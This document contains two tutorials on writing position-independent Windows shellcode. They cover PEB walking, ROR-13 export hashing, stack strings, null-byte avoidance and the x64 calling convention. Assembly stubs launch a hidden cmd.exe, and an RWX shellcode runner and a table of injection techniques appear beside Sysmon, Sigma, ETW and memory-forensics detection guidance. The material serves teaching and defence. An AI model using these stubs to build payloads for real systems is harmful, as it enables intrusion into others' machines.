Position-Independent Code: Writing PIC Shellcode Without Hardcoded Addresses
Objective: Understand how Windows shellcode achieves position independence — resolving module bases through the TEB/PEB chain, walking PE export tables, hashing API names, and eliminating null bytes — so defenders can detect the resulting memory and behavioral signatures and authorized red teamers can build and test payloads correctly.
1. What Makes Code Position-Dependent?
A normal Windows executable contains absolute virtual addresses everywhere: indirect calls through the Import Address Table (IAT), references to global variables, jump tables, and so on. The PE loader fixes these up at load time using the .reloc section and patches the IAT against the modules it has just mapped.
Shellcode has none of that. It is raw opcodes copied into a memory region (often allocated by VirtualAlloc or written into another process), with no loader, no relocation table, no IAT, and no guarantee about where it will live. Any hardcoded virtual address — to a string, to an API, to a jump target — will be wrong the moment the payload moves.
The constraint is therefore strict: every address the shellcode needs must be computed at runtime, from a known starting point that the OS itself hands the thread. On Windows, that starting point is the Thread Environment Block (TEB).
2. The Problem with the IAT
A standard PE binary calls LoadLibraryA via something like call qword ptr [rip+IAT_LoadLibraryA] — an indirect jump through a slot the loader populated. Shellcode cannot do this:
- It has no
.idatasection, noIMAGE_IMPORT_DESCRIPTOR, and no loader to read them. - It cannot embed an absolute
kernel32!LoadLibraryAaddress because ASLR randomizes module bases every boot. - It cannot rely on Windows syscall numbers either — those numbers are not a stable ABI and shift between builds.
The standard solution is PEB walking: the shellcode traces the in-memory loader data structures to find kernel32.dll, parses its export table, and resolves the handful of APIs it actually needs (typically LoadLibraryA and GetProcAddress, which then bootstrap anything else).
3. Windows Memory Layout Primer: TEB, PEB, and the Loader
Every Windows thread has a TEB. The OS keeps a pointer to it in a segment register so user-mode code can reach it in a single instruction:
| Architecture | Instruction | Result |
|---|---|---|
| x86 | MOV EAX, FS:[0x30] | EAX ← TEB.ProcessEnvironmentBlock (PEB) |
| x64 | MOV RAX, GS:[0x60] | RAX ← TEB.ProcessEnvironmentBlock (PEB) |
From the PEB, shellcode chains through Ldr (a _PEB_LDR_DATA*) to reach the loader’s three doubly-linked lists of _LDR_DATA_TABLE_ENTRY records — one entry per loaded module.
Relevant offsets (Windows 10/11):
| Struct | Field | x86 offset | x64 offset |
|---|---|---|---|
_TEB | ProcessEnvironmentBlock | +0x030 | +0x060 |
_PEB | Ldr | +0x00C | +0x018 |
_PEB_LDR_DATA | InLoadOrderModuleList | +0x00C | +0x010 |
_PEB_LDR_DATA | InMemoryOrderModuleList | +0x014 | +0x020 |
_PEB_LDR_DATA | InInitializationOrderModuleList | +0x01C | +0x030 |
_LDR_DATA_TABLE_ENTRY | DllBase | +0x018 | +0x030 |
_LDR_DATA_TABLE_ENTRY | BaseDllName | +0x02C | +0x058 |
Verify offsets on your target build with WinDbg (dt ntdll!_PEB, dt ntdll!_LDR_DATA_TABLE_ENTRY). They are stable across mainstream Windows 10/11 but not guaranteed forever.
// Conceptual layout — fields used by PEB-walking shellcode
typedef struct _LDR_DATA_TABLE_ENTRY {
LIST_ENTRY InLoadOrderLinks; // +0x00
LIST_ENTRY InMemoryOrderLinks; // +0x10 (x64)
LIST_ENTRY InInitializationOrderLinks;
PVOID DllBase; // +0x30 (x64)
PVOID EntryPoint;
ULONG SizeOfImage;
UNICODE_STRING FullDllName;
UNICODE_STRING BaseDllName; // +0x58 (x64)
// ...
} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
4. Walking the Module List to Find kernel32.dll
The loader populates InInitializationOrderModuleList in a predictable order: the main executable first, then ntdll.dll, then kernel32.dll. A common shortcut is to grab the third entry’s DllBase without ever comparing a name — fewer bytes, no strings, no signatures.
; x64 — locate kernel32.dll base via the PEB
; Output: RBX = kernel32.dll base address
xor rcx, rcx
mov rax, [gs:rcx + 0x60] ; RAX = PEB
mov rax, [rax + 0x18] ; RAX = PEB->Ldr
mov rax, [rax + 0x20] ; RAX = InMemoryOrderModuleList.Flink (1st: this EXE)
mov rax, [rax] ; 2nd entry: ntdll.dll
mov rax, [rax] ; 3rd entry: kernel32.dll
mov rbx, [rax + 0x20] ; LDR_DATA_TABLE_ENTRY.DllBase
; (offset 0x20 within an InMemoryOrder-rooted entry)For 32-bit shellcode the same idea applies with smaller offsets:
; x86 — same walk, FS-relative
xor ecx, ecx
mov eax, [fs:ecx + 0x30] ; EAX = PEB
mov eax, [eax + 0x0C] ; PEB->Ldr
mov eax, [eax + 0x14] ; InMemoryOrderModuleList.Flink
mov eax, [eax] ; 2nd
mov eax, [eax] ; 3rd (kernel32)
mov ebx, [eax + 0x10] ; DllBase (x86 offset)A more robust variant iterates the list and hash-compares BaseDllName.Buffer (Unicode), upper-casing each character inline. That survives reordering and is what production loaders use.
5. Parsing the PE Export Directory
Once RBX = kernel32!ImageBase, the shellcode parses the PE headers:
ImageBase
└─► IMAGE_DOS_HEADER.e_lfanew (+0x3C)
└─► IMAGE_NT_HEADERS
└─► OptionalHeader.DataDirectory[0] ; EXPORT
└─► IMAGE_EXPORT_DIRECTORY
├─ NumberOfNames
├─ AddressOfNames (RVA → name RVAs)
├─ AddressOfNameOrdinals (RVA → ordinal table)
└─ AddressOfFunctions (RVA → function RVAs)The three arrays are parallel: index i in AddressOfNames matches index i in AddressOfNameOrdinals, whose ordinal value o indexes AddressOfFunctions[o]. All values are RVAs, so the resolved function address is ImageBase + RVA.
; x64 — reach the export directory from RBX = ImageBase
; Output: RCX = IMAGE_EXPORT_DIRECTORY*
mov eax, dword [rbx + 0x3C] ; DOS.e_lfanew
lea rdx, [rbx + rax] ; RDX -> IMAGE_NT_HEADERS
mov eax, dword [rdx + 0x88] ; NT.OptionalHeader.DataDirectory[0].VirtualAddress
lea rcx, [rbx + rax] ; RCX -> IMAGE_EXPORT_DIRECTORY
mov r8d, dword [rcx + 0x18] ; NumberOfNames
mov r9d, dword [rcx + 0x20] ; AddressOfNames (RVA)
mov r10d, dword [rcx + 0x24] ; AddressOfNameOrdinals
mov r11d, dword [rcx + 0x1C] ; AddressOfFunctionsThe resolver then iterates 0..NumberOfNames-1, hashes the name string at ImageBase + Names[i], compares against a precomputed target, and on match returns ImageBase + Functions[ Ordinals[i] ].

6. Function Name Hashing (ROR-13)
Embedding the literal string "LoadLibraryA" would (a) introduce hardcoded data references and (b) be a trivial AV signature. The standard substitute is an inline rolling hash. The most common is ROR-13 add:
// Conceptual ROR-13 hash. Iterate bytes of the export name; stop at NUL.
// Same routine is implemented inline in assembly when resolving APIs.
unsigned int ror13_hash(const char *name) {
unsigned int h = 0;
while (*name) {
h = (h >> 13) | (h << (32 - 13)); // ROR 13
h += (unsigned char)*name++;
}
return h;
}
// Pre-computed constants (illustrative — recompute for your toolchain):
// LoadLibraryA -> 0x0726774C
// GetProcAddress -> 0x7C0DFCAA
// ExitProcess -> 0x73E2D87E
// VirtualAlloc -> 0x91AFCA54Replacing the while body with three cmp/ror/add instructions inside the export-walk loop produces a few dozen bytes of fully position-independent resolver — no strings, no absolute addresses, no relocations.
7. RIP-Relative Addressing and the CALL/POP Trick
When the shellcode does need inline data (a precomputed key, a config blob, a wide-string template), it must reference it without an absolute address.
x64 makes this nearly free: every LEA reg, [rel label] and direct CALL/JMP is encoded RIP-relative:
lea rcx, [rel api_hash_table] ; RIP-relative, no relocation neededx86 has no RIP-relative encoding. The classic substitute is the get-EIP trick: CALL past a label, then POP the return address into a register, giving you a known anchor:
call get_eip
get_eip:
pop ebp ; EBP = address of this instruction
; data referenced as [ebp + (label - get_eip)]Anything stored inline can now be addressed by displacement from EBP.
8. Stack Strings and Null-Byte Elimination
Shellcode is often delivered via a string-copying primitive (strcpy, lstrcpyA, a parser that stops at \0), so embedded null bytes truncate the payload. Two problems must be solved together: avoid nulls in opcodes, and produce required strings ("kernel32.dll", "WinExec", "cmd.exe") without storing them as data.
Construct strings on the stack by pushing immediates:
; Build "cmd.exe\0" on the stack (8 bytes including NUL)
xor rax, rax
push rax ; trailing NUL via zeroed qword
mov rax, 0x6578652E646D63 ; 'cmd.exe' (little-endian, no embedded zero)
push rax
mov rcx, rsp ; RCX -> "cmd.exe\0" — first arg for WinExecEliminate accidental nulls in opcodes:
| Avoid | Use instead | Reason |
|---|---|---|
mov rax, 0 (48 C7 C0 00 00 00 00) | xor rax, rax | Removes four NUL bytes |
push 0 (6A 00) | xor reg, reg; push reg | 6A 00 contains a NUL |
| Short jumps spanning NUL displacements | Pad with nop or reorder code | Avoids NUL in the offset byte |
mov al, 0x00 | xor al, al | Same fix at byte width |
Always disassemble and grep the assembled output for \x00 before shipping — see Section 10.
9. x64 ABI Constraints: Shadow Space and Alignment
Windows x64 imposes two rules shellcode authors get wrong constantly:
RSPmust be 16-byte aligned at the point ofCALLto any Windows API. TheCALLitself pushes an 8-byte return address, so the callee’sRSPends up at(16N - 8)on entry, which is what Microsoft’s prolog code expects.- The caller allocates 32 bytes of shadow space (a.k.a. home space) above the return address, even when the callee takes 0–4 arguments. The callee may spill
RCX,RDX,R8,R9into those slots.
The first four integer arguments go in RCX, RDX, R8, R9; further arguments are pushed right-to-left. Volatile registers (RAX, RCX, RDX, R8–R11) may be clobbered by any CALL; non-volatile (RBX, RBP, RDI, RSI, R12–R15) must be saved if you rely on them.
; Calling WinExec("cmd.exe", SW_HIDE) once API is resolved in RAX
and rsp, -16 ; force 16-byte alignment
sub rsp, 32 ; shadow space (home space)
lea rcx, [rsp + 0x40] ; pointer to "cmd.exe" (built earlier)
xor rdx, rdx ; uCmdShow = SW_HIDE (0)
call rax ; WinExec
add rsp, 32 ; tear down shadow spaceMisalignment typically manifests as STATUS_ACCESS_VIOLATION inside kernel32 or ntdll MMX/SSE prologs — a tell-tale crash signature when reviewing payloads.
10. Extraction and Controlled Testing
Once assembled with NASM, raw bytes are extracted from the COFF object and audited:
nasm -f win64 payload.asm -o payload.obj
objcopy -O binary -j .text payload.obj payload.binA quick Python harness verifies the payload is truly position-independent — no embedded nulls, no relocations:
# verify.py — sanity-check a raw shellcode blob
data = open("payload.bin", "rb").read()
print(f"[+] size: {len(data)} bytes")
null_offsets = [i for i, b in enumerate(data) if b == 0]
if null_offsets:
print(f"[!] {len(null_offsets)} NUL byte(s), first at offset {null_offsets[0]:#x}")
else:
print("[+] null-free")
# C-array dump for embedding in a test loader
print("unsigned char sc[] = {")
print(", ".join(f"0x{b:02x}" for b in data))
print("};")A minimal local loader executes the payload inside the same process for isolated VM testing — this is the educational sandbox, not a cross-process injector:
// test_runner.cpp — local-only execution for analysis in a VM
// Defenders: this RWX + function-pointer-cast pattern is exactly what
// EDR/ETW THREATINT flags. It is shown so you know what to look for.
#include <windows.h>
#include <string.h>
extern unsigned char sc[];
extern size_t sc_len;
int main(void) {
void *mem = VirtualAlloc(NULL, sc_len,
MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE);
memcpy(mem, sc, sc_len);
((void(*)())mem)();
return 0;
}The VirtualAlloc(PAGE_EXECUTE_READWRITE) → memcpy → indirect-call triad is the canonical shellcode runner pattern and is heavily instrumented.
11. Common Attacker Techniques
| Technique | Description |
|---|---|
| PEB walking | Resolve kernel32/ntdll bases via GS:[0x60] / FS:[0x30] without imports |
| Export hash resolution | ROR-13 (or FNV/djb2) hashing to find APIs without embedded strings |
| Stack strings | Push immediates to materialise "cmd.exe", "WinExec", etc., on the stack |
| Reflective loading | PIC stub maps a full DLL into memory and calls its DllMain (T1620) |
| Remote injection | VirtualAllocEx + WriteProcessMemory + CreateRemoteThread into a target PID |
| APC queuing | QueueUserAPC to deliver shellcode into an alertable thread |
| Process hollowing | Suspend a benign process, unmap its image, write PIC payload, resume |
| Module stomping | Overwrite the .text of a legitimately loaded DLL with PIC shellcode |
12. Defensive Strategies & Detection
PIC shellcode leaves consistent telemetry across Sysmon, ETW, and memory forensics.
Sysmon Event IDs to monitor:
| Event ID | Signal |
|---|---|
1 | Process creation (with command line) — anomalous parents (winword.exe → cmd.exe) |
7 | ImageLoad from user-writable paths into system processes |
8 | CreateRemoteThread — primary remote-injection signal |
10 | ProcessAccess with GrantedAccess containing 0x1F0FFF, 0x1410, or PROCESS_VM_WRITE \| PROCESS_VM_OPERATION \| PROCESS_CREATE_THREAD |
17/18 | Named pipe creation/connection (common C2 channel) |
25 | ProcessTampering (image hollowing) |
ETW providers give earlier and harder-to-evade signal: Microsoft-Windows-Threat-Intelligence (THREATINT) fires on VirtualAllocEx with PAGE_EXECUTE_READWRITE, WriteProcessMemory, and MapViewOfFile against remote processes. Consuming THREATINT requires a signed ELAM/PPL driver, which is why EDR vendors — not generic SIEMs — own this telemetry. Also enable the Audit Process Creation policy (Event ID 4688) with command-line inclusion, and Audit Kernel Object to capture OpenProcess handle requests.
Sigma sketch — cross-process handle access for injection:
title: Suspicious Cross-Process Access Likely Preceding Shellcode Injection
logsource:
product: windows
service: sysmon
detection:
selection:
EventID: 10
GrantedAccess|contains:
- '0x1F0FFF' # PROCESS_ALL_ACCESS
- '0x1410' # VM_READ|VM_WRITE|VM_OPERATION
- '0x1F1FFF'
TargetImage|endswith:
- '\lsass.exe'
- '\svchost.exe'
- '\explorer.exe'
filter_legit:
SourceImage|endswith:
- '\MsMpEng.exe'
- '\MsSense.exe'
condition: selection and not filter_legit
level: highMemory-forensics indicators: Volatility 3 malfind locates RWX regions containing executable code or PE headers in non-image memory; ldrmodules flags executable regions not represented in any of the three PEB loader lists — the canonical reflective/PIC signature. Threads whose StartAddress falls inside a heap allocation rather than a mapped image are inherently suspicious.
Hardening:
| Mitigation | Effect |
|---|---|
ACG (ProcessDynamicCodePolicy) | Forbids new executable pages; breaks VirtualAlloc(PAGE_EXECUTE_READWRITE) |
| DEP / NX | Hardware-enforced non-execute on data pages |
| CFG | Invalidates indirect calls to non-registered targets |
| HVCI | Hypervisor-enforced kernel code integrity |
| ASR rules | Block office/script children, untrusted USB execution, etc. |
Restrict SeDebugPrivilege | Limits which accounts can open and write to other processes |

13. Tools for PIC Shellcode Analysis
| Tool | Description | Link |
|---|---|---|
| WinDbg | Verify struct offsets (dt ntdll!_PEB, dt ntdll!_LDR_DATA_TABLE_ENTRY) | microsoft.com |
| NASM | Assemble x86/x64 PIC payloads in Intel syntax | nasm.us |
| x64dbg | Dynamic analysis of shellcode in a loader harness | x64dbg.com |
| Ghidra / IDA | Static disassembly of extracted opcodes | ghidra-sre.org |
| Process Hacker | Inspect process memory regions and protections | processhacker.sf.io |
pe-sieve | Hunts injected, hollowed, or stomped modules | github.com/hasherezade/pe-sieve |
| Volatility 3 | malfind, ldrmodules, vadinfo for memory-resident PIC | volatilityfoundation.org |
| YARA | Signature ROR-13 loops, PEB-walk prologues, hash tables | virustotal.github.io/yara |
| SilkETW | Subscribe to THREATINT and Kernel-Process providers | github.com/mandiant/SilkETW |
14. MITRE ATT&CK Mapping
| Technique | MITRE ID | Detection |
|---|---|---|
| Reflective Code Loading | T1620 | Volatility malfind / ldrmodules; THREATINT ETW |
| Process Injection (parent) | T1055 | Sysmon EID 10 + EID 8; ETW THREATINT WriteVM/AllocVM |
| Process Injection: DLL | T1055.001 | Sysmon EID 7 from unusual paths; pe-sieve |
| Process Injection: APC | T1055.004 | Kernel-Process ETW thread events on alertable waits |
| Process Injection: Hollowing | T1055.012 | Sysmon EID 25 ProcessTampering; pe-sieve hollowing scan |
| Obfuscated Files or Information | T1027 | YARA on ROR-13 hash loops and stack-string push sequences |
| Command and Scripting Interpreter | T1059 | EID 4688 / Sysmon EID 1 with command-line auditing |
Summary
- Position-independent shellcode replaces the PE loader’s work at runtime: it must resolve every address it touches, starting from the segment-register pointer to the TEB.
- The PEB →
Ldr→InMemoryOrderModuleListchain reacheskernel32.dllin three pointer dereferences without any string comparison. - Parsing the PE export directory with ROR-13 hashed lookups removes embedded API name strings and the static signatures they create.
- Stack-string construction,
XOR-zero idioms, and RIP-relative addressing keep the byte stream null-free and relocation-free. - Defenders catch the resulting behaviour through Sysmon EID
8/10, THREATINT ETW onVirtualAllocEx/WriteProcessMemory, and Volatilitymalfind/ldrmodulesagainst unbacked RWX regions — and harden processes with ACG, CFG, HVCI, and ASR rules to break the primitive entirely.
Related Tutorials
- Writing x64 Shellcode: Differences, Shadow Space, and Register Conventions
- Writing Your First Shellcode: x86 Reverse Shell from Scratch
- Shellcode Encoders: XOR Encoding, Custom Decoders, and Avoiding Bad Chars
- Egghunters: Staged Payload Delivery When Buffer Space Is Tight
- Bad Characters, Null Bytes, and Restricted Character Sets
References
- Reflective Code Loading, Technique T1620 – Enterprise | MITRE ATT&CK
- Process Injection, Technique T1055 – Enterprise | MITRE ATT&CK
- Donut – Generating Position-Independent Shellcode | MITRE ATT&CK Software S0695
- Process Injection: Portable Executable Injection, Sub-technique T1055.002 – Enterprise | MITRE ATT&CK
- Position-Independent Code Techniques | hackerhouse-opensource/shellcode | DeepWiki
- PIC-Library: A Collection of Position Independent Coding Resources | GitHub
Writing x64 Shellcode: Differences, Shadow Space, and Register Conventions
Objective: Understand the architectural and ABI-level differences between x86 and x64 Windows shellcode, including the Microsoft x64 calling convention, shadow space, stack alignment, position-independent API resolution via PEB walking, and the detection surface each technique exposes.
1. From x86 to x64: What Actually Changed
Moving shellcode from x86 to x64 Windows is not a syntactic exercise of renaming EAX to RAX. The ABI changed, the segment register that anchors the TEB changed, and the addressing model changed. A snippet that “looks right” can execute cleanly, corrupt the host process, and crash three calls later inside an SSE instruction — none of which gives the author an obvious clue.
| Item | x86 | x64 |
|---|---|---|
| General-purpose registers | 8 × 32-bit (EAX…EDI) | 16 × 64-bit (RAX…R15) |
| Windows calling convention | stdcall / cdecl — all args on stack | Unified fast-call — first 4 integer args in registers |
| TEB segment register | FS; PEB at fs:[0x30] | GS; PEB at gs:[0x60] |
| Address width | 32-bit | 64-bit (48-bit canonical VA in practice) |
call pushes | 4-byte return address | 8-byte return address |
| RIP-relative addressing | Not available | Available; lea rax, [rip + offset] is idiomatic in PIC |
Two consequences dominate the rest of this tutorial. First, x64 adopts a single __fastcall-style ABI with a mandatory shadow space and 16-byte stack alignment rule. Second, the TEB is reached via GS, not FS, and every PEB offset must be updated for the 64-bit struct layout.
2. The Microsoft x64 ABI Deep-Dive
The Microsoft x64 calling convention passes the first four integer arguments in registers and floating-point arguments in the low halves of the first four XMM registers. Anything beyond that goes on the stack, above the shadow space, pushed right-to-left.
| Argument # | Integer Register | Floating-Point Register |
|---|---|---|
| 1st | RCX | XMM0L |
| 2nd | RDX | XMM1L |
| 3rd | R8 | XMM2L |
| 4th | R9 | XMM3L |
| 5th+ | Stack (above shadow space) | Stack |
The return value lives in RAX for integers and pointers, and in XMM0 for floating-point results.
Volatile vs Non-Volatile Registers
| Class | Registers |
|---|---|
| Volatile | RAX, RCX, RDX, R8, R9, R10, R11, XMM0–XMM5 |
| Non-volatile | RBX, RBP, RDI, RSI, RSP, R12, R13, R14, R15, XMM6–XMM15 |
A callee may freely destroy volatile registers; non-volatile registers must be preserved across calls. Shellcode that clobbers RBX or RDI in the host thread and then returns control corrupts the host. This is the single most common reason “working” shellcode crashes the host process several instructions after the shellcode finishes.
Side-by-Side: x86 Push vs x64 Register Load
; --- x86 stdcall: MessageBoxA(0, "msg", "title", 0) ---
push 0 ; uType
push title ; lpCaption
push msg ; lpText
push 0 ; hWnd
call [MessageBoxA] ; callee cleans the stack
; --- x64 fastcall: same call ---
xor rcx, rcx ; hWnd = NULL
lea rdx, [rel msg] ; lpText
lea r8, [rel title] ; lpCaption
xor r9d, r9d ; uType = 0
sub rsp, 0x28 ; shadow space + alignment (see §4)
call [rel MessageBoxA]
add rsp, 0x28Note xor r9d, r9d rather than xor r9, r9 — writing to the 32-bit sub-register zero-extends to the full 64-bit register and produces a shorter, null-byte-free opcode.

3. Shadow Space: Why, What, and Where
In the Microsoft x64 convention the caller must reserve 32 bytes (4 × 8) of stack immediately above the return address as shadow space (also called home space or spill space). This area exists so the callee has somewhere to spill RCX, RDX, R8, and R9 back to memory if it needs to take their addresses or free up the registers for re-use.
Critical points:
- Shadow space is always reserved, even when the callee takes fewer than four arguments and even when the callee never spills.
- It is owned by the caller. The callee may overwrite it without saving the previous contents.
- The caller does not zero or initialise it. The callee is responsible for whatever it writes there.
- Stack arguments beyond the fourth begin at
[RSP + 0x28](32 bytes shadow + 8 bytes return address).
Layout immediately after call, before callee prologue | Offset from RSP |
|---|---|
Return address (pushed by call) | [RSP + 0x00] |
Shadow slot for RCX | [RSP + 0x08] |
Shadow slot for RDX | [RSP + 0x10] |
Shadow slot for R8 | [RSP + 0x18] |
Shadow slot for R9 | [RSP + 0x20] |
| 5th argument (if any) | [RSP + 0x28] |
Skip the shadow allocation and the first thing the callee does — often a mov [rsp+8], rcx early in a Win32 prologue — clobbers your own stack frame or, worse, the saved return address you just pushed.

4. Stack Alignment in Practice
The Microsoft x64 ABI requires RSP to be 16-byte aligned at the moment of a call, except inside a prolog. The hardware call then pushes an 8-byte return address, so on entry to the callee RSP is 16N + 8 aligned. Win32 internals (memcpy, CRT, anything that uses SSE/AVX with aligned moves) will issue movaps / movdqa against stack locations and will raise EXCEPTION_ACCESS_VIOLATION (0xC0000005) if RSP is wrong by 8.
This is why the canonical shellcode prologue is sub rsp, 0x28, not 0x20:
0x20(32 bytes) for shadow space.+ 0x08to undo the misalignment the precedingcallintroduced.
; Canonical shellcode call wrapper
sub rsp, 0x28 ; 32B shadow + 8B realign
call rax ; rax = resolved API address
add rsp, 0x28When the shellcode entry itself was reached by a jump from unknown context, force alignment explicitly:
; Defensive entry: align RSP regardless of caller state
and rsp, 0xFFFFFFFFFFFFFFF0 ; force 16-byte alignment
sub rsp, 0x28 ; shadow + 8 to keep call-time alignmentTo diagnose alignment faults in WinDbg, dump the faulting instruction (u .) and check whether it is a movaps / movdqa referencing [rsp+…]. If rsp & 0xF == 0x8 at the call, you forgot the + 0x08.
5. Position-Independent Code Fundamentals
Shellcode does not know where it will land. Hard-coded addresses are forbidden — ASLR randomises module bases per boot, and the shellcode itself is dropped at an allocator-chosen address. Two x64 idioms enable position independence:
- RIP-relative addressing.
lea rax, [rel label]resolves tolea rax, [rip + disp32]and produces correct results regardless of load address. This is the preferred way to reference embedded data in x64 shellcode. call/popdelta trick. Acallto the next instruction pushes its return address — the runtime location of the following label. The calleepops it into a register to obtain a base for subsequent offsets.
; Obtain the runtime address of `data` without RIP-relative encoding
call get_rip
get_rip:
pop rbx ; rbx = address of next instruction
lea rsi, [rbx + data - get_rip]
jmp continue
data:
db "kernel32.dll", 0
continue:In practice, prefer lea reg, [rel label] for clarity; reach for call/pop only when an encoder demands it (for example, to avoid certain bad bytes).
6. PEB Walking: Finding kernel32.dll Without Imports
Because shellcode has no import table, it must walk the loader’s in-memory bookkeeping to find kernel32.dll and then resolve GetProcAddress / LoadLibraryA from its exports. On x64 Windows the chain starts at GS and uses these offsets:
| Step | Source | Field | Offset (x64) |
|---|---|---|---|
| 1 | GS segment | → TEB | — |
| 2 | TEB | ProcessEnvironmentBlock | +0x060 |
| 3 | PEB | Ldr → PEB_LDR_DATA | +0x018 |
| 4 | PEB_LDR_DATA | InMemoryOrderModuleList | +0x020 |
| 5 | LDR_DATA_TABLE_ENTRY link | InMemoryOrderLinks.Flink | +0x000 |
| 6 | LDR_DATA_TABLE_ENTRY | DllBase (from InMemoryOrderLinks) | +0x030 |
The InMemoryOrderModuleList on a normal process begins with the executable, then ntdll.dll, then kernel32.dll. Walking two Flinks from the head reaches the kernel32.dll entry. Production-grade shellcode hashes the BaseDllName string rather than trusting that order, both for resilience and because EDRs deliberately permute the head of the list as a tripwire (see §10).
; --- PEB walk skeleton: locate kernel32.dll base in rax ---
xor eax, eax
mov rbx, [gs:0x60] ; TEB -> PEB
mov rbx, [rbx + 0x18] ; PEB -> Ldr (PEB_LDR_DATA)
mov rbx, [rbx + 0x20] ; -> InMemoryOrderModuleList.Flink
; (points into 1st LDR_DATA_TABLE_ENTRY's InMemoryOrderLinks)
mov rbx, [rbx] ; advance: -> 2nd entry (ntdll)
mov rbx, [rbx] ; advance: -> 3rd entry (kernel32)
mov rax, [rbx + 0x30] ; DllBase relative to InMemoryOrderLinks (x64)
; rax now holds kernel32.dll base addressTo verify the offsets against the target OS build, drop into WinDbg on a live process and dump the structures directly:
0:000> dt nt!_TEB ProcessEnvironmentBlock
0:000> dt nt!_PEB Ldr
0:000> dt nt!_PEB_LDR_DATA InMemoryOrderModuleList
0:000> dt nt!_LDR_DATA_TABLE_ENTRY DllBase BaseDllName
0:000> !lmi kernel32
7. Parsing the Export Address Table
With kernel32.dll‘s base in hand, the shellcode walks the PE headers to the Export Directory and then iterates AddressOfNames, comparing each name against a precomputed hash. String literals like "GetProcAddress" are avoided to defeat trivial signatures and to remove embedded nulls.
Key offsets from a loaded module base:
| Field | Offset |
|---|---|
e_lfanew (RVA of PE header) | DllBase + 0x3C |
| Optional Header | PE_header + 0x18 |
| Export Directory RVA (PE32+) | OptHeader + 0x70 |
AddressOfFunctions | ExportDir + 0x1C |
AddressOfNames | ExportDir + 0x20 |
AddressOfNameOrdinals | ExportDir + 0x24 |
; --- EAT walk outline: resolve an export by ROR-13 name hash ---
; in : rax = module base, ebp = target hash (e.g. for "GetProcAddress")
; out: rax = exported function address (or 0)
mov ecx, [rax + 0x3C] ; e_lfanew
add rcx, rax ; rcx = PE header
mov edx, [rcx + 0x88] ; Export Directory RVA (OptHdr + 0x70)
add rdx, rax ; rdx = IMAGE_EXPORT_DIRECTORY
mov r8d, [rdx + 0x18] ; NumberOfNames
mov r9d, [rdx + 0x20] ; AddressOfNames RVA
add r9, rax
xor r10, r10 ; index
.next_name:
mov esi, [r9 + r10*4] ; name RVA
add rsi, rax ; rsi -> ASCII export name
xor edi, edi ; hash accumulator
.hash_byte:
movzx eax, byte [rsi]
test al, al
jz .check
ror edi, 13
add edi, eax
inc rsi
jmp .hash_byte
.check:
cmp edi, ebp ; compare ROR-13 hash
je .found
inc r10
cmp r10d, r8d
jb .next_name
xor rax, rax ; not found
ret
.found:
; resolve via AddressOfNameOrdinals + AddressOfFunctions
; (omitted for brevity)
retThe ROR-13 rotate-and-add hash, popularised by the Metasploit block_api stub, is the de facto standard precisely because defenders now key on it (see §10).
8. Null-Byte and Bad-Character Avoidance
Shellcode delivered through a string-copy primitive (strcpy, lstrcatA, format-string echo) is truncated at the first null byte. x64 immediates routinely embed nulls because most useful constants and addresses do not occupy all 64 bits.
| Problem | Fix |
|---|---|
mov rax, 0x000000007FFE1234 → nulls | xor eax, eax then mov eax, 0x7FFE1234 (zero-extends) |
64-bit literal in mov r9, imm64 | lea r9, [rel label] or build via shifts/ORs |
push 0 → encodes 6A 00 | xor rcx, rcx ; push rcx |
mov rcx, 0 → 7-byte null run | xor ecx, ecx |
; --- Null-byte comparison ---
; BAD: mov rax, 0x76ab1234
; 48 B8 34 12 AB 76 00 00 00 00 <-- four null bytes
mov rax, 0x76ab1234
; GOOD: zero-extend via 32-bit sub-register
; 31 C0 <-- xor eax, eax
; B8 34 12 AB 76 <-- mov eax, 0x76AB1234
xor eax, eax
mov eax, 0x76ab1234Writing to EAX implicitly zeroes the upper 32 bits of RAX — this single architectural quirk eliminates most accidental nulls in shellcode constants.
A short Python lab to validate a candidate snippet:
from keystone import Ks, KS_ARCH_X86, KS_MODE_64
asm = b"""
xor eax, eax
mov eax, 0x76ab1234
mov rbx, qword ptr gs:[0x60]
mov rbx, qword ptr [rbx + 0x18]
"""
ks = Ks(KS_ARCH_X86, KS_MODE_64)
code, _ = ks.asm(asm)
buf = bytes(code)
print(buf.hex())
bad = [i for i, b in enumerate(buf) if b == 0x00]
print(f"length={len(buf)} bad_byte_offsets={bad}")Run it, see exactly where nulls (or any other bad character) land, and rewrite the offending instruction.
9. Shellcode Skeleton: Putting It Together
The pieces combine into a recognisable x64 stub: align the stack, walk the PEB to find kernel32.dll, parse the EAT to resolve GetProcAddress and LoadLibraryA, and then call out through the standard ABI with proper shadow space.
[BITS 64]
_start:
; --- entry: defensively align stack ---
and rsp, 0xFFFFFFFFFFFFFFF0
sub rsp, 0x28 ; shadow space + alignment
; --- locate kernel32.dll via PEB ---
mov rbx, [gs:0x60] ; TEB -> PEB
mov rbx, [rbx + 0x18] ; PEB -> Ldr
mov rbx, [rbx + 0x20] ; InMemoryOrderModuleList.Flink
mov rbx, [rbx] ; -> ntdll entry
mov rbx, [rbx] ; -> kernel32 entry
mov r15, [rbx + 0x30] ; r15 = kernel32 base
; --- resolve GetProcAddress via ROR-13 hash (call into eat_lookup) ---
mov rcx, r15
mov edx, 0x7C0DFCAA ; ROR-13("GetProcAddress") (illustrative)
call eat_lookup ; rax = &GetProcAddress
mov r14, rax
; --- call LoadLibraryA("user32.dll") via GetProcAddress ---
mov rcx, r15 ; hModule = kernel32
lea rdx, [rel s_LoadLibraryA]
call r14 ; rax = &LoadLibraryA
lea rcx, [rel s_user32]
call rax ; rax = HMODULE user32
; --- ... continue resolution and API calls ...
add rsp, 0x28
ret
s_LoadLibraryA: db "LoadLibraryA", 0
s_user32: db "user32.dll", 0
; eat_lookup: in rcx=module base, edx=ROR13 hash -> rax = export addr
eat_lookup:
; (see §7 for the inner loop)
retEvery block in the skeleton corresponds to one of the rules established above: sub rsp, 0x28 for shadow + alignment, gs:[0x60] for the PEB, [rbx + 0x30] for DllBase, lea + RIP-relative strings for PIC, and r14 / r15 carrying non-volatile state across calls without manual save/restore.
10. Common Attacker Techniques
| Technique | Description |
|---|---|
| PEB-walk API resolution | Locate kernel32.dll via gs:[0x60] chain, parse exports by hash |
| ROR-13 export hashing | Avoid embedded API name strings; survive static signature scans |
| RIP-relative PIC | lea reg, [rel label] to address embedded data without fixups |
| Sub-register zero-extension | mov eax, imm32 to write RAX with no null bytes |
| Shadow-space-aware call wrapping | sub rsp, 0x28 around every Win32 call from an unknown caller |
| Direct Win32 → Native API substitution | Call Nt* syscalls to bypass usermode hooks (T1106) |
